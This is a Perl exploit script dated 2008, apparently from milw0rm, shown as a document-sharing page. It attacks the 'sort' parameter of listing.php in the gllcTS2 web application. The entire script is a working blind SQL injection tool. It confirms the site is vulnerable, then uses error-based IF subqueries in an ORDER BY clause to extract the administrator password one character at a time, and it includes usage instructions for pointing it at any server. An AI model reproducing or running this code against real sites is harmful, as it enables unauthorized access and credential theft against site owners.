GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit by h3m4n

VIEWS: 29 PAGES: 3

									                            GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                    Page 1/3
      1   #!/usr/bin/perl
      2   ######################
      3   #
      4   #gllcTS2 (listing.php $sort) Remote Blind SQL Injection Exploit
      5   #
      6   ######################
      7   #
      8   #Bug by: h0yt3r
      9   #
  10      ##
  11      ###
  12      ##
  13      #
  14      #This one shows another vulnerability in the gllcTS2. (Thera are many with simple injections)
  15      #Same Versions are affected.
  16      #Also shows the conecpt of how to inject an ORDER BY statement via Blind Injection and
  17      #WITHOUT benchmark(), means we produce an error if the IF statement returns TRUE.
  18      #
  19      #Gr33tz go to:
  20      #b!zZ!t, ramon, thund3r, Free−Hack, Sys−Flaw and of course the neverdying h4ck−y0u Team
  21      #
  22      ################
  23      use LWP::UserAgent;
  24      my $userAgent = LWP::UserAgent−>new;
  25
  26      usage();
  27
  28      $server = $ARGV[0];
  29      $dir = $ARGV[1];
  30
  31
  32      print"\n";
  33      if (!$dir) { die "Read Usage!\n"; }
  34
  35
  36      $filename ="listing.php";
  37
  38      my $vulnCheck = "http://".$server.$dir.$filename;
  39
  40      my $prefix ="";
  41
  42      my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76"
          ,"77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30");
  43
  44      my $Attack= $userAgent−>get($vulnCheck);
  45      if ($Attack−>is_success)
  46      {
  47           print "[x]Attacking ".$vulnCheck."\n";
  48      }
  49      else
  50      {
  51           print "Couldn’t connect to ".$vulnCheck."!";
n/a                                                                                                                        06/13/2008
                            GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                                   Page 2/3
  52         exit;
  53    }
  54
  55    print "[x]Vulnerable Check:";
  56
  57    my $check = $vulnCheck."?sort=’";
  58
  59    my $Attack= $userAgent−>get($check);
  60    if($Attack−>content =~ m/FROM (.*?)_weblist/i)
  61    {
  62         print " Vulnerable!\n";
  63         $prefix = $1;
  64    }
  65    else
  66    {
  67         print " Not Vulnerable!";
  68         exit;
  69    }
  70
  71    my $hex="";
  72    my $length;
  73
  74    print "[x]Bruteforcing Length\n";
  75
  76    my $lengthCounter = 1;
  77    while(1)
  78    {
  79          #To inject ORDER BY (where we cannot union select) we just have to pass a simple IF statement.
  80          #Instead of Benchmark() we can use a subquery which, in this case, would return "Subquery returns more than 1 row
        " if the statement actualle is true.
  81          my $url = "".$vulnCheck."?sort=IF(LENGTH((select admin_pass from ".$prefix."_admin))=".$lengthCounter.",(select 1 union select 5),null)&
        direction=desc&showgroup=all";
  82          my $Attack= $userAgent−>get($url);
  83          my $content = $Attack−>content;
  84          if($content =~ m/Please contact a the site admin immediately./i)
  85          {
  86               $length=$lengthCounter;
  87               last;
  88          }
  89          else
  90          {
  91               $lengthCounter++;
  92          }
  93    }
  94
  95
  96    print "[x]Injecting Black Magic\n";
  97
  98    for($b=1;$b<=$length;$b++)
  99    {
  100       for(my $u=0;$u<28;$u++)
  101       {
n/a                                                                                                                                        06/13/2008
                           GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                                        Page 3/3
  102                my $url = "".$vulnCheck."?sort=IF(substring((select admin_pass from ".$prefix."_admin),".$b.",1)=0x".$Daten[$u].",(select 1 union sel
        ect 5),null)&direction=desc&showgroup=all";
  103
  104             my $Attack= $userAgent−>get($url);
  105
  106             my $content = $Attack−>content;
  107
  108             if($content =~ m/Please contact a the site admin immediately./i)
  109             {
  110                 print "[x] Found Char ".$Daten[$u]."\n";
  111                 $hex=$hex.$Daten[$u];
  112                 last;
  113             }
  114
  115             else
  116             {
  117                  #Whatever...
  118             }
  119        }
  120   }
  121
  122   print "[x]Converting \n";
  123   my $a_str = hex_to_ascii($hex);
  124
  125   print "[x]Success! \n";
  126   print " Adminpassword: $a_str\n";
  127
  128   sub hex_to_ascii ($)
  129   {
  130           (my $str = shift) =~ s/([a−fA−F0−9]{2})/chr(hex $1)/eg;
  131           return $str;
  132   }
  133
  134   sub usage()
  135   {
  136       print q
  137       {
  138       ######################################################
  139                 gllcTS2 Remote Blind SQL Injection Exploit
  140                            −Written by h0yt3r−
  141       Usage: gllcts2.pl [Server] [Path]
  142       Sample:
  143       perl gllcts2.pl www.site.com /cms/
  144       ######################################################
  145       };
  146
  147   }
  148
  149   # milw0rm.com [2008−06−13]



n/a                                                                                                                                            06/13/2008

								
To top